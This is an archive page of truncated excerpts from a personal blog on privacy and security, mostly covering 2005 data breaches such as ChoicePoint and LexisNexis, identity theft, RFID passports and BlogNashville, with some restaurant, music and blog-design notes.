Via Gizmodo, we learn of the mysterious and wonderous Sogreni Bicycle Trouser Clip. I’m not sure what a bicycle trouser clip is, but I bet you could get it spinning pretty fast to, you know, enhance a frank exchange of views with the bikes-are-just-for-Friday crowd.

 

Advances in Financial Cryptography – "First Issue"

I have a long list of issues with the academic publishing process. I’m a big fan of the Public Library of Science model. So when Ian Grigg asked me if I’d be interested in helping with his new publishing model, I was pretty excited. And now, I have an essay in the first issue: I’m […]

 

Minh: Great Vietnamese in Arlington, VA

I had lunch yesterday at Minh, at 2500 Wilson Blvd, Arlington, VA, and it was excellent. The spring rolls were crispy, tender, and not greasy. I had mint scallops as a main, and they were subtle and well prepped. The dessert, which I think was made offside was a hollowed out tangerine filled with tangerine […]

 

Small Bits of Chaos

Thomas Schelling is, without a doubt, one of the smartest people I’ve ever been privileged to meet. There’s a long interview with him at the Federal Reserve Bank of Richmond. (Via Marginal Revolution.) Ryan Singel has a long excerpt from Joe Lieberman. Normally, I don’t agree with much he has to say, but this is […]

 

A few Typographies of Bloggers

First, a very brief bit of terminology: A typography is a way to organize things, much like a taxonomy. Each item within a typography has clearly distinguishing characteristics, but there’s no hierarchy such as animal, vertebres, mammals, hominids, humans. To be honest, I’m not sure if this is a typography or just some categories. But […]

 

Well, Hello Nurse!

The fine folks over at NCircle seem to have been given a directive from on high: Let there be blogs! And there were. And ncircle saw, and they were good. And someone said, let the bloggers be prolific, and behold, they were, with 18 or more posts in 5 days. Great coverage of CanSecWest, and […]

 

"It's the Medicine Talking"

Dr Jim Swan, a consultant to the drinks industry, said: “There has been much in the news about the health benefits of antioxidants in red wine. By contrast, very little has been said about malt whisky distillery science. “However, research has shown that there are even greater health benefits to people who drink single malt […]

 
 

$4.5 Billion and Whaddaya Get?

If you’re the Department of Homeland Security, another day older and deeper in debt. The New York Times reports on “U.S. to Spend Billions More to Alter Security Systems:” Passenger-screening equipment at airports that auditors have found is no more likely than before federal screeners took over to detect whether someone is trying to carry […]

 

On Being Fully Present

Right before Mark Glasser started his talk on protecting bloggers (which Nashville files covers really well), Mark asked to borrow my laptop (picture by Nashville Files.) [Update, May 11, Mark’s column about BlogNashville is now online, and he mentions this as his pet peeve.] We got into a discussion of me having just attempted to […]

 

Real ID, Real Problems

Bill Scannell writes: We have less than 48 hours to stop our nation from having a National ID card scheme. Do we really want to have the same ID system as Communist China? I think not. The US Senate is scheduled to vote this Tuesday on the Real ID Act. They’ve never debated the bill. […]

 

Emerging from BlogNashville

I have about 30 tabs open from Blognashville, and probably not enough time to sort through them all. Also, I really want to spend time thinking about what I heard and learned at the anonymous blogging roundtable and the protecting bloggers session (well covered by the Nashville Files.) So a link dump: The New York […]

 

Customer Relationships, Data Relationships

The computer industry is good at coming up with Orwellian names for things. The software that call center operators and others use is called a “Customer Relationship Management” system (or ‘CRM.’) The goal of such systems is to help you decide which of your customers are profitable, and give them better service. Cynics might add: […]

 

Making Money Blogging

I was unfortunately late to the Making Money Blogging session at BlogNashville. It was run by Henry Copeland of Blogads. There was a lot of discussion on driving ads, targeting ads, complaining that RSS doesn’t allow you to demographic your audience. There was some great discussion of how Major League Baseball is drawing baseball bloggers […]

 

BlogNashville was Great

I didn’t expect to have quite such a good time at BlogNashville. I mean, really. But I did. I felt really energized, and learned an awful lot from conversations. I left before the tailgating and evening dinners because I was already pretty worn down at 5PM, and it was going to be a long drive […]

 

When Was The Last Time You Linked Outside the US?

In Hoder’s session on Building a Blogosphere, Rebecca MacKinnon asked “what can we do to encourage people to link to bloggers internationally?” Thats been sort of a theme today. I think its challenging, because often bloggers in different places have very different orientations; that combination of cultural, educational, and training background that acts as a […]

 

Texas DMV, hundreds, mailing errors

An agency that warns Texans not to share personal information with strangers because of the risks of identity theft mistakenly mailed hundreds of driver’s licenses to the wrong people. The Texas Department of Public Safety (DPS) blamed the mixup on a malfunctioning machine that was recently installed to sort licenses for mailing. Statewide, at least […]

 

Anonymous Blogging Roundtable

I think the roundtable went well. Mark Glasser started us off with a review of the state of the world, with China having 67 bloggers in jail, Bahrain requiring bloggers to register, Cuba having a black market in email accounts with one costing $240, out of an average annual income of $1700. We talked a […]

 

Off To BlogNashville

I’m finishing my coffee, and about to hop in the car for BlogNashville, and the Anonymous Blogging Roundtable.

 

SafeNet, hundreds, paper in a briefcase

An employee hoping to get extra work done over the weekend printed out 2004 payroll information for hundreds of Safenet’s U.S. employees, snapped it into a briefcase and placed the briefcase in a car. The car was broken into over the weekend and the briefcase stolen – along with the employees’ names, bank account numbers […]

 

Corporate Welfare from TSA

USA Today reports “U.S. asks for more data on travelers” The federal government plans to begin collecting the full names and birth dates of air travelers this summer in its latest effort to screen passengers for possible links to terrorism. In a few weeks, the Transportation Security Administration will notify airlines, travel agents and online […]

 

The Coming Privacy Law

Perspectives from the gossip industry are presented by Information Week, in “Execs Testify In Favor Of National Data-Security Law:” In prepared testimony for a hearing by the House Committee on Financial Services, executives from Bank of America, ChoicePoint, and LexisNexis supported legislation patterned after California’s law requiring companies to notify customers about security breaches. ChoicePoint […]

 

Software Design Pointers

Gunnar Peterson asks “How far can software architects get using a purely rational approach to software development,” and Michael Howard points to Dave Leblanc’s “Another Look at the SafeInt Class.” If you write in C++, check out the SafeInt stuff. It’s the sort of “close off a class of vulnerabilities” approach that I love.

 

Copyright, Aggregators, and Readership

I’ve been thinking lately about licensing my content under a Creative Commons license, maybe non-commercial, attribution. As I think about such things, I look for scenarios where I’d be sad I’d done such a thing. While I haven’t come up with any, I’ve been noticing lately that more and more of my readership comes via […]

 

SHIFT Bicycle

Scott S. Shim, an assistant professor in the Purdue College of Liberal Arts, along with students Ryan Lightbody and Matt Grossman have won the 9th International Bicycle Design Competition in Taiwan, according to this press release. (Unfortunately, the web site isn’t going to win any design awards.) “None of us had ever designed a bicycle […]

 

Choicepoint Analyses

Today’s Wall Street Journal has an good summary article, “For Big Vendor of Personal Data, A Theft Lays Bare the Downside” (Thanks, Nick!. Also, the Pittsburgh Post-Gazette has picked up the story, and made it available): The vulnerability of the company’s data and its difficulty in tracking the breach point to a paradox. ChoicePoint and […]

 

Time Warner, 600,000 employees, Iron Mountain Backup Tape

Time Warner Inc. on Monday said data on 600,000 current and former employees stored on computer back-up tapes was lost by an outside storage company, which the U.S. Secret Service is now investigating. Time Warner’s data storage company, Boston-based Iron Mountain Inc., lost the tapes during transport, Time Warner said. reports the New York Times. […]

 

Single Serving Friend: Technology For Staying In Touch

Following up on my earlier post about staying in touch, there’s a bit of technology that I’ve been meaning to build for, well, over a year now, and haven’t gotten to it. I was in Portland, Oregon for business, and someone I was speaking with said “Hey, you know Lucas Nelson is there this week?” […]

 

Perspectives on "Identity Theft"

WYFF-TV, “The Carolina Channel,” interviews two fraudsters who made money impersonating others. If you have any doubt these people are scum, one impersonated his own brother, and stole $71,000. In another, on Dave Farber’s list, victim Tom Goltz writes: Speaking as a victim of identity theft, there is absolutely nothing that an individual can do […]

 

Zabbo Blogs (again!)

I’m very excited to discover that my friend Zach Brown is blogging again. Zach was one of a group of friends who introduced me to blogs in, maybe late ’99? Early 2000? He’d been on haitus, and I’m glad he’s back. But I realized that my excitement felt a little odd, and so I’ve been […]

 

Small Bits of Chaos all Starting with Names

Mike Solomon, of PithHelmet fame, comments on RSS spam, and promises to do something about it. (Incidentally, I’ve been wondering about NetNewswire’s cookie behavior when you load pages, but some rummaging in it’s files didn’t seem to turn up cookies, and I needed to go blog earn money.) Alan Chapell (whose blog is looking much […]

 

Portland Withdraws Support from Terror Task Force

Mayor Potter, a former Portland police chief, earlier this year requested that the federal government grant him, the police chief and the city attorney top-secret security clearance — the same as task force officers — so that city leaders could have access to case files and more frequent updates. Potter said he wanted the ability […]

 

Drivers License Fraud

As the trust and reliance people place in drivers licenses, the greater the incentive to get fraudulently issued ones. FoxNews reports on “Workers Charged With Taking Payoffs for IDs ” (via JihadWatch.) “With a valid driver’s license, you establish an identity,” said Michael Garcia, assistant secretary of the Homeland Security Department. … The three Florida […]

 

Way To Debate!

Since Choicepoint demonstrated that screening is hard, they’ve been repeating the phrase “We look forward to a national debate.” But at yesterday’s annual meeting, they once again failed to engage in that debate. The LA Times has an AP story “No Answers for ChoicePoint Shareholders” (Bugmenot, because no other paper has picked up the story, […]

 

Choicepoint Annual Meeting

But today, the chairman and chief executive of Alpharetta-based ChoicePoint is likely to get a feel for his standing on a smaller stage: whether he is held in esteem by ChoicePoint shareholders. … Lauren Waits, who oversaw ChoicePoint’s charitable giving program before leaving earlier this year, describes her former boss as a visionary who also […]

 

National Legislative Roundup

In “Proposed Legislation Limiting PI Access to Data“, Private Investigator News and Information provides the National Council of Investigation and Security Services’s roundup of legislation that would affect the private investigator business. Naturally, the private investigators are up in arms; their job is about to be made a lot harder over something that wasn’t their […]

 

Hofmeyr on Legislation

1386 provides a huge incentive for companies to secure their systems, without restricting or constraining the way in which they should do so, leaving companies to choose the most effective way. This encourages innovation in defense, because should new, more effective defense strategies become available, companies are more likely to adopt them, whereas if they […]

 

Blockbuster, 65, Employee Miles N. Holloman

A former employee of a Blockbuster video store in Washington, D.C., has been indicted on charges of stealing customers’ identities, then using them to buy more than $117,000 in trips, electronics and other goods. Miles N. Holloman is charged with stealing credit card numbers, Social Security numbers and other private financial information from the application […]

 

Victory Against RFID Passports is Near

“The State Department seems to be putting down the purple Kool-Aid and looking at the serious problem this technology presents,” said Mr. Scannell, who runs an Internet site called RFIDKills.com; the first part of the name stands for radio frequency identification chips. “But no matter how much stuff you layer on the technology, it is […]

 

Small Bits: Labelling Software, People, Aaron Weisburd's Foreign Policy

Gunnar Peterson offers up a label for software that he stole from Jeff Williams. I had a good, if short, back and forth with Geoff, of Screen Discussion, in his comments, on using photographs to enhance criminal background checks, by including photos with the records of criminals, so the viewer of a report can compare. […]

 

Banks as Big Brother

“AML software will change international banking forever,” said Suheim Sheikh of SDG Software, an Indian software firm hoping to tap into the big new market. “Governments across the world will have their eyes on bank customers,” he added. “Since the software can monitor so many accounts, so many transactions, all kinds of people will be […]

 

Usability as a Security Concern

Building new technologies involves making tradeoffs. A programmer can only develop so many features in a day. These tradeoffs are particularly hard in building privacy enhancing technologies. As we work to make them more secure, we often want to show the user more information to help them make better decisions. This impacts usability. The security […]

 

What Are You Hiding, Democrat?

Time Magazine reports: The State Department has traditionally put together a list of industry representatives for these [Inter-American Telecommunication Commission] meetings, and anyone in the U.S. telecom industry who had the requisite expertise and wanted to go was generally given a slot, say past participants. Only after the start of Bush’s second term did a […]

 

Choicepoint: April 24

The Privacy Law Site posted on the Schumer-Nelson Comprehensive Privacy bill on April 13, but I just found it. The author summarizes the bill. Richard Clarke has a column in the New York Times, “You’ve Been Sold,” in which he outlines some reasonable parts of a new law. [Added shortly after first posting.] The Seattle […]

 

PithHelmet

After a recent hard drive failure on my Mac, I realized just how much I hate the web. No, that’s not really true. I don’t hate the web. I think the web is great. Advertising on the web, that drives me to distraction. And so I realized how much I appreciate Mike Solomon’s PithHelmet plug-in […]

 

Cool Music

While denying being a member of the ruling class, Asteroid points to some pretty cool music, including DJ Earworm, which helped me track down another site Asteroid mentioned: DJ Cal, at Robootlegs.com, whose “Hendrix vs Jackson – Foxy Jean Haze” is a masterpiece.

 

OSVDB Blog

Speaking of distributed innovation, the Open Source Vulnerability Database is a great project, dedicated to accumulating deep technical knowledge about computer security vulnerabilities, and making it freely available. And now it turns out, they have a blog! Mark Ward has an interesting article, “Predicting Vulnerabilities, Quotes and more.” When the patch comes out, many people […]

 

MBP On Impatience

Martin Pool, whose blog lacks a comment facility, quotes a history of Windows NT: The first two weeks of development were fairly uneventful, with the NT team using Microsoft Word to create the original design documentation… Finally, it was time to start writing some code. (I wish I’d seen this line a couple of days […]

 

Distributed Innovation

In the New York Times, Virginia Postrel writes about the work of Eric von Hippel, head of the Innovation and Entrepreneurship Group at the Sloan School of Management at MIT, who has a new (academic) book, “Democratizing Innovation.” But a lot of significant innovations do not come from people trying to figure out what customers […]

 

"£155,000 per instance of fraud"

Bruce Schneier writes: The UK government tried, and failed, to get a national ID. Now they’re adding biometrics to their passports. Financing for the Passport Office is planned to rise from £182 million a year to £415 million a year by 2008 to cope with the introduction of biometric information such as fingerprints. A Home […]

 

Small Bits: Airport Security, Tax Web Bugs

Stupid Security covers an AP story: Security at U.S. airports is no better under federal control than it was before the Sept. 11 attacks, a key House member says two government reports will conclude. None of us here [at Stupidsecurity] are surprised. The real fun begins with the second paragraph: “A lot of people will […]

 

Small Bits: Ameritrade, Tax & web privacy, revolution, medicine

It turned out someone I had dinner with last night had gotten an Ameritrade letter. According to her, Amertrade is not offering credit monitoring service.* “Lotus, Surviving A Dark Time,” has some good analysis: Well, duh with a PR stamp. How could they have heard of any such “misuse?” If customers had any bad experiences, […]

 

CMU, 5,000+, Hacker

A hacker who tapped into business school computers at Carnegie Mellon University may have compromised sensitive personal data belonging to 5,000 to 6,000 graduate students, staff, alumni and others, officials said yesterday. … There is no evidence that any data, including Social Security and credit card numbers, have been misused, officials said. But they have […]

 

Choicepoint Earnings

ChoicePoint Inc. (NYSE: CPS), today reported first quarter total revenue growth of 19 percent compared to 2004. First quarter total revenue for 2005 was $259.3 million. … These expenses included approximately $2.0 million for communications to, and credit reports and credit monitoring services for, individuals receiving notice of the fraudulent data access and approximately $3.4 […]

 

Small Bits of Security Chaos: Airports (2), Bastille Linux adds metrics

The Department of Homeland Security Office of Inspector General has written a report on TSA security: Improvements are still needed in the screening process to ensure that dangerous prohibited items are not being carried into the sterile areas of airports, or do not enter the checked baggage system. In our report on the results of […]

 

Choicepoint, April 20

Presto Vivace reports that: During the April NCC AIIM meeting, a member of the audience asked how the IRS’ Free-File could avoid becoming another ChoicePoint, clearly a reference to recent security breaches. Everyone in the room immediately understood the reference; no explanation was needed. CBS Marketwatch reports “For now, little way to halt firms’ leaks […]

 

Trackbacks vs. Technorati?

Kip Esquire points to WILLisms, who wants to “Save the trackback.” I think I’m running about 10-to-1 spam trackbacks to real ones. It’s clearly because I talk about nothing but poker and viagra. I have to say, I love getting real trackbacks. I like it when people take what I’ve said and expand on it. […]

 

Ameritrade, 200,000 SSNs, Backup Tape

Some days I feel like I’m playing Clue…It was Mr. Mustard, in the study with the lead pipe. Ameritrade Inc. has advised 200,000 current and former customers that a computer backup tape containing their personal information has been lost, MSNBC.com has learned. The tape contained information spanning the years 2000-2003, and included both current and […]

 

Removing Excel Macros?

I have a document where I started to create a macro, then realized that some clever search and replace would work. So I stopped creating the macro. But now, the document (which I share with others) has a macro in it. Sure, its possible to open with macros disabled, but I’d like to remove the […]

 

Hasbrouck on RFID Passports

In his closing CFP keynote, Bill Scannell of RFIDKills.com asked for voice votes by the audience on whether a series of government measures including the use of secretly and remotely-readable RFID chips in passports were stupid or evil. “Both” seemed to be the predominant response. I and some others (including Ryan Singel of Wired News […]

 

DSW, IRS Security Failures

What is it with order of magnitude errors in victim counts? DSW Shoe reports 1.4 million credit cards exposed. In other news, the General Accounting Office reports [The IRS] has corrected or mitigated 32 of the 53 weaknesses that GAO reported as unresolved at the time of our prior review in 2002. However, in addition […]

 

Lebanese Democracy

The fine folks at Spirit of America are blogging their time in Lebanon. Yesterday, they point to Pulse of Freedom, where folks working towards real democracy in Lebanon are blogging. Very cool.

 

What Do You Need To Do To Get Fined?

As I covered in “Canadian Privacy Law and CIBC,” CIBC spent years faxing information to, amongst others, a West Virginia scrap yard. Today, the Privacy Commissioner released her report, and asks that they please, pretty please do better next time. See the press release, if you really want to. Via Dave Akin.

 

Housing Bubble?

Tyler Cowen asks, does DC have a housing bubble, and asks how can we justify the price rise: Housing can be lived in, most buyers have only one home, transaction costs are relatively high, and rarely are homes sold and resold in a matter of days. All those features militate against a housing bubble. Yet […]

 

Relentless Navel Gazing, in the blogger syle

I’ve made a couple of CSS changes. (CSS is the Content Style Sheet which controls how this page looks in your browser.) Mostly making the CSS fully valid, and adding some padding around list items so they don’t scrunch together quite as much. Aren’t you thrilled? Do let me know if it looks messed up, […]

 

Sophocles

Speaker B: And the helmets are shaking their purple-dyed crests, and for the wearers of breast-plates the weavers are striking up the wise shuttle’s songs, that wakes up those who are asleep. is a pretty unexceptional line of a play, unless you happen to be a classicist, familiar enough with the works of Sophocles to […]

 

Apple Security Update 10.3.9, Analyzed

I have a confession to make. I’ve spent way too much time thinking about patching, and secure programming technique. This week’s Apple security update is interesting to me for a few reasons. Two side comments before I delve into the nitty-gritty. What’s with releasing this at 5.30PM on a Friday? If Microsoft had done that, […]

 

Polo Ralph Lauren Breach: The Rules Have Changed.

The security failure at Polo Ralph Lauren is going to be a big story. Not Choicepoint big, but big. According to ComputerWorld, in “Scope of credit card security breach expands: [An emailed] statement also noted that Polo Ralph Lauren has been working with law enforcement officials and credit card companies since fall 2004 to determine […]

 

Small Bits: Turing Test, Keynote HTML!, individual i, zipcar,

Students need volunteers: Back in the 1930s, Alan Turing proposed a “Gender Guessing Game” in which a judge, connected to two people in closed rooms with a teletype each, would attempt to guess which was a man and which was a woman. Turing then proposed extending the game into his infamous “Turing Test” where a […]

 

DNA Dragnets Not Needed

In January, I blogged about the city of Truro, Mass, trying to get DNA samples from all 790 residents. (“DNA Dragnets” and “DNA Dragnets and Criminal Signaling.”) The New York Times reports that they’ve arrested someone: Mr. McCowen was first considered a possible suspect in April 2002, three months after the murder, Mr. O’Keefe said, […]

 

Choicepoint, April 15

Inside Bay Area claims “Protecting consumers’ personal information may not be possible.” Former Congressman Bob Barr, writing for Findlaw, disagrees in an insightful article. Robert Gelman suggests that government only buy from vendors who voluntarily follow fair information practices in the second half of his DMNews editorial, “ . . And Into the Fire” Businessweek […]

 

Congratulations, Choicepoint!

You’ve won the Big Brother award for Lifetime achievement! It was a tough battle for top place this year, and while Choicepoint was the people’s fave, we all know that those privacy elitists don’t really care about the little people. Other winners included California’s Brittan Elementary. The Department of Education got worst government department, despite […]

 

Small Bits of Chaos: Video, Anonymous Blogs, Real ID Act dead

This New York Times article on Videos Challenge Accounts of Convention Unrest covers the fascinating conflict between the video and human memories of an event; the issues raised by transparent video editing, and other issues. Worth reading. During a recess, the defense had brought new information to the prosecutor. A videotape shot by a documentary […]

 

Choicepoint, April 14

Following yesterday’s Congressional testimony, there’s analysis by Thomas Greene in The Register, also in Internet News. The Atlanta Journal Constitution reports that Choicepoint VP Doug Curling, and LexisNexis President Kurt Stanford both seemed to come out as accepting of extending fair information practices to their businesses. The testimony prompted editorials in USA Today, and the […]

 

Dear Canon

Dear Canon, Why do you make it harder for me to download the software for my camera than to download a brochure? Is it because I’m stuck and have already bought your camera? Do you hope I’ll forget this experience? Because I can’t figure out how to make either of my web browsers suck enough […]

 

Ed Felten on Passports

Yesterday at CFP, I saw an interesting panel on the proposed radio-enabled passports. Frank Moss, a State Department employee and accomplished career diplomat, is the U.S. government’s point man on this issue … In the Q&A session, I asked Mr. Moss directly why the decision was made to use a remotely readable chip rather than […]

 

Breaches: Tufts, GM/HSBC/Ralph Lauren

Infoworld reports 106,000 Tufts Alumni getting letters, and Cnet reports that “A bank tells 180,000 people who used their GM MasterCards at Polo Ralph Lauren that their data may have been stolen.” (That sounds like a strange set of circumstances. Who sorts their data by credit card issuer?)

 

Orientation and Supreme Court Rulings

Over at Volokh, Orin Kerr has a beautiful analogy which illustrates orientation issues in reading Supreme Court cases. By orientation, I mean the sum of cultural, educational, and training experience that come together to influence the way people interpret the things they observe. (In other words, what Boyd meant.) Kerr writes (emphasis mine):  I think […]

 

Rational Response?

Sitting at a coffeeshop today, I listened to the fellow behind me try to get Dell and Equifax to agree to fix his credit. It seems that his father passed away recently, in debt to Dell over a computer. That debt is now on his credit report, despite his not being a co-signer for the […]

 

Small Bits: Iran annoyed, Academic Publishing, Immigration law, Iraqi Justice

Iran seems to be annoyed that Canada is engaged in a minimal attempt to find out who murdered Zahra Kazemi, and see that they’re brought to justice. It seems that more and more academics are getting the word: Access to your research is good. I wonder when the computer scientists at IEEE and ACM will […]

 

Choicepoint Roundup, April 13

Internet News has one of many reports on the latest breaches, this one titled “Feinstein Tightens ID Theft Proposal” Bob Sullivan at MSNBC reports on background checks: But experts say the nationwide tallies are often full of holes, and contain as few as 70 percent of all felony conviction records, leading in turn to a […]

 

Choicepoint's "Privacy" Officer

Declan has some choice words about Choicepoint’s new Credentialling, Compliance and privacy officer, in “Sidelining Homeland Security’s privacy chief:” DiBattiste sounded like she was replying to a pesky reporter when she wrote back [To TSA Privacy Officer Nuala O’Conner Kelly]: “TSA Public Affairs has no information in response to your request.” How fitting, then, that […]

 

59 breaches at Lexis-Nexis

[T]he company said just 2% of those informed by the company in March of the security breach had accepted its offer of free credit monitoring and none had reported identity theft. All the others will also be offered the services it said. (From CNN, or see the statement here.) So, let’s review. A slew of […]

 

Choicepoint, April 9-12

The Daily Caveat tells us that “Choicepoint Changes Access to Personal Data, and Research News has more. No word on what level of audits Choicepoint will be doing. It sounds like there will be a pulldown menu or checkboxes for “allowable uses,” perhaps causing people to think for a bit, then get used to selecting […]

 

Happy Gagarin Day!

Forty-four years ago today, Yuri Alexeyevich Gagarin became the first person to fly in space. There’s a fascinating anecdote from Doug Higley at the Encyclopedia of Astrobiology, Astronomy, and Spaceflight. Higley was with the US Army Security Agency unit tasked with monitoring Russian missiles on the day Gagarin flew. Or read up on the Yu. […]

 
 

Lexis Nexis, Tenfold

Lexis Nexis is saying that they understated the number of victims in last month’s incident. It is not 32,000, but 310,000. Kudos to them for stepping up and admitting to it. It’s the right thing both ethically and strategically. Reed spokesman Patrick Kerr said that the first batch of breaches was uncovered by Reed during […]

 

A Picture is Worth A Thousand Words

I’ve briefly mentioned the story of a fellow getting his finger hacked off so the thieves could make off with his S-Class Mercedes. But images are far more powerful than words. Google claims that the German reads “Forest worker…or S-Class owner?” I’d love it if someone could offer a translation of the German text in […]

 

AdScam in Canada

Apr. 10 – People who compare Adscam to Watergate are missing a vital difference. Whereas the Watergate hearings began with the use of private donations to President Nixon’s re-election campaign for illegal operations, Adscam is increasingly exposing the use of public, taxpayer money to fund the election campaigns of the Liberal Party. So says Being […]

 

Anti-Terror Funds Earning Interest

Over drinks, I like to enrage my computer security colleagues by suggesting that we’re spending too much on computer security. My evidence for this is that, despite all the attacks and break-ins and worms and what-have-you, no one’s going out of business. But the news in Saturday’s Washington Post, “Most Area Terrorism Funding Not Spent,” […]

 

Dear American Airlines

Over at Boing-Boing, Cory posts the latest in his saga of having American Airlines ask for a written list of his friends. As I thought about this story, I realized something very worrisome. I fly American! I also realized that I don’t know if I’ll have the right papers with me when I do. So […]

 

Small Bits: Digitizing Art, Making Sense, Wages of Sin, Pookmail

Capturing the Unicorn is an article at the New Yorker about the hubris of technologists trying to capture art. (The technologists win, but the archivist in me asks: CDs?) 13 things that do not make sense is a New Scientist article about, well, 13 things that don’t make sense. Some foolish people might look at […]

 

Workers Steal PINs, Cash

BANGALORE, India — Former employees of a call center in Pune, India, were arrested this week on charges of defrauding four Citibank account holders in New York, to the tune of $300,000, a police official said. The three former employees of Mphasis BPO, the business process outsourcing operation of Bangalore software and services company Mphasis […]

 

Choicepoint, April 8

Choicepoint has been nominated for a lifetime Big Brother award. Best of luck, folks! Prophet or Madman points to an article at Knowledge@Wharton about the issues raised by the case. Robert Gellman has a column in DMnews “Out of the Frying Pan.” Choicepoint has announced their earnings call and webcast, on April 21. (Is ‘before […]

 

Small Bits: Hezbollah, Blowhards, Shit & Cookie Monster

JihadWatch points to a Sunday Times article: PALESTINIAN fighters have revealed that Hezbollah, the militant Lebanese group backed by Iran, is offering to pay for attacks aimed at shattering the fragile truce with Israel. Maciej Ceglowski has some harsh words for Paul Graham’s essay “Hackers and Painters,” in an essay “Dabblers and Blowhards. However, he […]

 

Small Bits

Newsday reports on Orange County, Florida Sheriff Kevin Beary abusing law enforcement access to records. He sent a letter to Alice Gawronski’s home, objecting to her letter to a local neswpaper. He claims it was “legitimate use of public records.” Dan Farmer’s new company, Elemental Security, has launched. Speaking of launched, Steve Hofmeyer, of Sana […]

 

Interim Pope

Normally, I try to avoid comment on religious matters, but I think its important to be aware that Samablog has taken the first step to becoming an anti-Pope by declaring himself Interim Pope. The blogosphere shall elect the next pope! Or something. We bloggers didn’t cause the Thirty Years war.

 

Choicepoint, April 3-7

Diebold, Choicepoint Partner to Offer Innovative Voting Technology was an April Fools item I forgot to blog: Alpharetta, GA – Diebold Election Systems and Choicepoint, Inc., today announced a joint venture that could revolutionize the voting market. The concept is simple: combine Diebold’s demonstrated expertise in voting systems with Choicepoint’s superior data-mining techniques to produce […]

 

Anonymous Blogging Project

I’ve mentioned the Spirit of America anonymous blogging project before. To help move things forward, I’ve offered Jim Hake my assistance as a project coordinator. As Jim describes the project: The project is to review all available technologies and techniques and get the input of the best minds available to put together a plan for […]

 

More on AIM & Privacy

Recently, I griped about AOL’s privacy policy. Today, PGP Corp announced their second public beta of PGP 9, which includes support for encrypting AIM sessions. Its not clear if this will be in the personal edition. I sure hope so.

 

5th Privacy Enhancing Technologies Workshop

The program has been posted for The Fifth Privacy Enhancing Technologies Workshop, which will be held in Drubrovnic , Croatia, 30 May – 1 June. (Corrected spelling.) There’s an affiliated executive briefing, 2-3 June.

 

4th Workshop on the Economics of Information Security

The Fourth Workshop on the Economics of Information Security will be held in Boston, June 2-3. The schedule is now online. I’ll be presenting a short essay on “Avoiding Liability: An Alternative Route to More Secure Products” at the rump session. I’d love feedback. Ian Grigg has talked about alternate review systems.

 

Relentless Navel Gazing

I never really liked the bar down the side of my blockquotes, and have finally replaced them, with a style stolen from Simple Thoughts. They’re in 52pt Copperplate as transparent background gifs. Does anyone know how to add a second image, at bottom right? Putting background: url(http://www.emergentchaos.com/close-quote.png) no-repeat bottom right; url(http://www.emergentchaos.com/quote.png) no-repeat top left; into […]

 

Small Bits: Canada, DNA, Microsoft and Tea

While publicly recalling their Ambassador over the brutal murder of Zahra Kazemi, the Canadian government was playing host to Iranian officials, looking for security information, reports the CBC: In dozens of e-mails, there is no mention of Kazemi, and no one questions why Canada would help Iran, considered by some to be a brutal police […]

 

Making Steady Progress, Keep Paying Us

In this New York Times article on NASA’s “broken safety culture,” we find: In the months after the Columbia disaster in February 2003, the space agency started several initiatives to enhance safety, including the creation of an Engineering and Safety Center at its Langley Research Center in Virginia. It has worked with Behavioral Science Technology, […]

 

Clueless about ID Theft

I’m not sure if Jon Ostik’s column “Want to prevent ID theft? Get back to basics” is a brilliant April Fool’s Day joke, or, an example of, as the Identity Theft blog claims, “Many “security professionals” are clueless about identity theft.” Before anyone panics, the logical first step in any security process is an audit. […]

 

One Nice Thing About a Written Constitution

A legal principle which prevents people being tried for the same crime twice is being scrapped in England and Wales. The ban on “double jeopardy”, which has existed for around 800 years, will be consigned to history from Monday. The Court of Appeal can now quash an acquittal and order a retrial when “new and […]

 

Cool Tech Not at RSA

Quick! Someone get these folks a marketing department! Someone showed me a cool password storage token from Mandylion Labs. You can load passwords over a little electronic interface, and then keep long lists of superuser passwords in your pocket. I had to mail my buddy to get their name. It seems somewhat better than a […]

 

Stroopwafels!

My local supermarket has Stroopwafels! They’re cleverly hidden in the cookie section, which I carefully avoid (due to a lack of willpower). But next time someone gripes about global free trade, I have a miniature stroopwafel to throw at them. Yes, I got the mini ones. No, I’m neither illiterate, nor smoking anything. I got […]

 

BlogRoll

I’ve added Screendiscussion to the blogroll. I don’t always agree with Geoff, but he seems insightful, interesting, and genuinely willing to grapple with the questions that his profession raises. He also posts actual posts, rather than a clipblog. For example, this morning’s post is “Background Checks Must Be Relevant, and points out a case where […]

 

Choicepoint, April 2

The Atlanta Journal Constitution has an editorial “ChoicePoint’s offer not enough :” The better solution would be to prohibit companies such as ChoicePoint from warehousing personal information in the first place, since security has proved so problematic. Computerized collections of consumers’ Social Security numbers, credit information, driving histories, medical and court records may make commerce […]

 

Information Security Magazine on Choicepoint

Information Security Magazine has an interview with Choicepoint CISO Richard Baich. It’s behind a subscriber-wall, so I’m excerpting bits of it after the read more.. (Via Run-DMZ.)

 

Small Bits: Biometrics in Drivers Licenses, Cars, Privacy Art

Grits for Breakfast writes about his testimony before the Texas House in Biometrics debate hinged on ID theft: The committee also seemed surprised that DPS had included facial recognition technology in their drivers license re-engineering RFP, even though the Legislature did not approve it. My understanding is that the AAMVA (American Association of Motor Vehicle […]

 

Iranian Treatment of Journalists

Rape, Torture, and Lies An ongoing Canadian saga has a sad new twist today: photojournalist Ziba Zahra Kazemi was likely brutally tortured and raped before her death in Iran in 2003. Arrested after a demonstration, the official Iranian line has been that her death was an accident due to injuries from a fall. The ER […]

 

Choicepoint Acquires Emergent Chaos

Alpharetta, Georgia, April 1 /PRNewsWire/ Alpharetta-based information broker Choicepoint today announced its intent to acquire the blog “EmergentChaos,” citing market synergies, cost reductions, and new revenue opportunities. Financial terms of the deal were not disclosed, but Choicepoint CEO Derek Smith said “We knew just which buttons to push.” Emergent Chaos is a weblog, or “blog,” […]

 

Choicepoint, March 29-31

Alacrablog discusses a Morgan Stanley research report: Certainly manageable numbers, but I think the report underplays both the potential growth in these markets prior to these incidents and the rising costs due to increasing regulation of the data brokers. There’s also an interesting post rounding up the SIA Anti-Money Laundering conference. The Atlanta Business Journal […]

 

"Public Availability of Private Information"

Screendiscussion makes a case for criminal records searching as an adjunct to a background check: One of the biggest downsides is that the records can only be searched by name, an occurrence that is becoming more common even at the lower courts. This might not be a problem if the name being searched is pretty […]

 

Three Times is Enemy Action

With the announcement yesterday of a stolen laptop with 30 years of alumni social security numbers on it, and the October break-in that led to 1.4 million people being exposed, how long until California forbids the University from holding such numbers? Clearly, they’re not to be trusted; students have no choice but to provide that […]

 

P2P, Filenames

